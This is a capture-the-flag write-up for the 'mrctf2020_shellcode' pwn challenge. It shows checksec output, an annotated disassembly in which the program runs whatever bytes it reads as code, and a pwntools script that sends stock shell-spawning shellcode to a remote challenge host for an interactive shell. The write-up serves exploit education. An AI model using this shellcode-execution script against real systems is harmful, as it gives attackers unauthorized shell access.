
mrctf2020_shellcode

Ubuntu16.04


checksec

[*] '/home/zelas/Desktop/pwn/mrctf2020_shellcode/mrctf2020_shellcode'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments

IDA

main()

; Attributes: bp-based frame

; int __cdecl main(int argc, const char **argv, const char **envp)
;
; Review notes (defender's reading of this IDA listing):
;   - checksec above reports NX disabled and RWX segments, so the stack slot
;     `buf` is executable memory.
;   - read() is bounded to 400h bytes into a 410h-byte slot, so this is not a
;     stack overflow; the weakness is that `buf` is later used as a call target
;     (see loc_11D6 below), i.e. input bytes are run as code.
;   - Mitigation: build with NX / non-executable stack and never transfer
;     control into data that came from an untrusted source.
public main
main proc near

buf= byte ptr -410h                     ; 0x410-byte input buffer on the stack
var_4= dword ptr -4                     ; return value of read()

; __unwind {
push rbp
mov rbp, rsp
sub rsp, 410h                           ; frame: buf + var_4
mov rax, cs:stdin@@GLIBC_2_2_5
mov esi, 0 ; buf
mov rdi, rax ; stream
call _setbuf                            ; setbuf(stdin, NULL) -> unbuffered
mov rax, cs:stdout@@GLIBC_2_2_5
mov esi, 0 ; buf
mov rdi, rax ; stream
call _setbuf                            ; setbuf(stdout, NULL)
mov rax, cs:stderr@@GLIBC_2_2_5
mov esi, 0 ; buf
mov rdi, rax ; stream
call _setbuf                            ; setbuf(stderr, NULL)
lea rdi, s ; "Show me your magic!"
call _puts
lea rax, [rbp+buf]
mov edx, 400h ; nbytes                  ; at most 0x400 bytes, fits inside buf
mov rsi, rax ; buf
mov edi, 0 ; fd                         ; fd 0 = stdin
mov eax, 0
call _read                              ; read(0, buf, 0x400)
mov [rbp+var_4], eax
cmp [rbp+var_4], 0
jg short loc_11D6                       ; any positive byte count -> go call buf

loc_11D6

loc_11D6:                               ; reached only when read() returned > 0 bytes
lea rax, [rbp+buf]
call rax                                ; indirect call into the input buffer: untrusted bytes execute as code
mov eax, 0                              ; main's return value; only reached if the called code returns

0x02


思路

读取输入到 buf，若 read 返回的长度大于 0，则直接调用 buf（把输入当作代码执行）

0x03


exp

from pwn import *

# pwntools context: verbose logging; Linux/amd64 matches the checksec output above.
context(log_level='debug', os='linux', arch='amd64')
# Remote challenge instance; the local-process variant is kept commented out.
io = remote('node4.buuoj.cn', 28388)
# io = process(['./mrctf2020_shellcode'])

# shellcraft.sh() is pwntools' stock shell-spawning payload, assembled for context.arch.
# The binary calls whatever it reads into buf (see main's `call rax` above), which is
# why no further setup is needed -- this works only because NX is disabled.
shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()

